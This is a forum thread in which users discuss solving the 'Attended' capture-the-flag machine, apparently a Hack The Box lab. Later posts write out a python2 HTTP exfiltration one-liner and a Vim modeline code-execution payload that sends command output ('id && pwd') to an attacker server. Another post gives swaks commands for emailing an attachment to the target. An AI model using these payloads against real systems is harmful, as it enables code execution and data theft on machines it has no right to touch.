TUTORIAL ATTENDED [DISCUSSION]
by 0xvijay - December 20, 2020 at 06:26 AM
#37
(January 11, 2021 at 05:25 PM)0xvijay Wrote:
(January 11, 2021 at 03:22 PM)Hum12sa Wrote: Anyone would like to team up for root?

tell steps for user


thankyou

DM Me

(January 12, 2021 at 07:09 AM)EddieFlagg Wrote: I haven't been able to get user shell, just sending myself some pings from the target or a reverse shell on port 25 that dies instantly.

Can anyone post steps to user? happy to give you my coins if you wanna hide it.

From what I can tell, we need to read the socket in tmp and connect using that without a password. Not sure how to read it.

Ever heard of data exfiltration ? either through dns or iCMP Packets  Or Raw HTTP Requests ?
Reply
#38
(January 12, 2021 at 09:17 PM)Hum12sa Wrote:
(January 11, 2021 at 05:25 PM)0xvijay Wrote:
(January 11, 2021 at 03:22 PM)Hum12sa Wrote: Anyone would like to team up for root?

tell steps for user


thankyou

DM Me

(January 12, 2021 at 07:09 AM)EddieFlagg Wrote: I haven't been able to get user shell, just sending myself some pings from the target or a reverse shell on port 25 that dies instantly.

Can anyone post steps to user? happy to give you my coins if you wanna hide it.

From what I can tell, we need to read the socket in tmp and connect using that without a password. Not sure how to read it.

Ever heard of data exfiltration ? either through dns or iCMP Packets  Or Raw HTTP Requests ?

Yeah, I tried for around 4 hours to get data out using the -p flag. I could get it working locally in a test, but not on the remote target. I assume it's that I'm trying to use commands on the target that are not there to convert the pattern to hex. I think I'm getting closer
Reply
#39
(January 12, 2021 at 09:46 PM)EddieFlagg Wrote:
(January 12, 2021 at 09:17 PM)Hum12sa Wrote:
(January 11, 2021 at 05:25 PM)0xvijay Wrote:
(January 11, 2021 at 03:22 PM)Hum12sa Wrote: Anyone would like to team up for root?

tell steps for user


thankyou

DM Me

(January 12, 2021 at 07:09 AM)EddieFlagg Wrote: I haven't been able to get user shell, just sending myself some pings from the target or a reverse shell on port 25 that dies instantly.

Can anyone post steps to user? happy to give you my coins if you wanna hide it.

From what I can tell, we need to read the socket in tmp and connect using that without a password. Not sure how to read it.

Ever heard of data exfiltration ? either through dns or iCMP Packets  Or Raw HTTP Requests ?

Yeah, I tried for around 4 hours to get data out using the -p flag. I could get it working locally in a test, but not on the remote target. I assume it's that I'm trying to use commands on the target that are not there to convert the pattern to hex. I think I'm getting closer

Same here, but u tried using some script or just ping? with script in bash i can send files in localhost idk if work same commands in attended, if u can read files how u do that
Reply
#40
I have not tried the ping, I will give it a shot. thanks
Reply
#41
Bumping this to the front page.
Reply
#42
you can use python to exfilter data as well python2 -c "import requests; requests.get('http://<urserver>/')" this works MAKE SURE TO USE python2 not python
Reply
#43
Did anybody get root yet? I am having hard time figuring it out.
Reply
#44
I'm on the same boat I'm not that good with pwn.
Reply
#45
(January 21, 2021 at 03:35 AM)xxxyz Wrote: I'm on the same boat I'm not that good with pwn.

any nudges to root? stucking on that part
Reply
#46
Hello guys..
a strange thing happens to me with this shit box if I attach this:
:!python2 -c "import requests; requests.get('http://10.10.x.x/x')"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" ---> Work

but if attach this:
:!python2 -c "import base64; import requests; import os;import subprocess; requests.get('http://10.10.x.x/'+base64.b64encode(subprocess.check_output('id && pwd', shell=True)))"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
Not work ... but I tried locally and perfectly work ... Fuck!!!
Reply
#47
(December 27, 2020 at 10:12 PM)kalihackboy Wrote: Yeah, I've gotten the following 2 responses using swaks:

swaks --to [email protected] --from [email protected] -s 10.10.10.221:25
swaks --to [email protected] --from [email protected] --attach shell.py -s 10.10.10.221:25

1st:
hi mate, could you please double check your attachment? looks like you forgot to actually attach anything :)
p.s.: i also installed a basic py2 env on gw so you can PoC quickly my new outbound traffic restrictions. i think it should stop any non RFC compliant connection.

2nd:
thanks dude, i'm currently out of the office but will SSH into the box immediately and open your attachment with vim to verify its syntax.
if everything is fine, you will find your config file within a few minutes in the /home/shared folder.
test it ASAP and let me know if you still face that weird issue.

Stuck at this point on payload to deliver for shell. Was looking into Vim exploits based on the email & signature but no success with that yet.
can you pass me your exploit?
Reply
#48
bumping for updates - trying to unstall my pgress
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Attended User how to lingling40hrs 20 4,804 March 05, 2021 at 06:00 PM
Last Post: Buttmuncher
TUTORIAL Weather App [Discussion] n3m3n91 18 2,496 March 04, 2021 at 09:25 PM
Last Post: loverboiz2403
TUTORIAL PWN Restaurant DISCUSSION n3m3n91 1 417 March 04, 2021 at 02:56 AM
Last Post: diceter

 Users browsing this thread: Ro0ted, thebigbad, 2 Guest(s)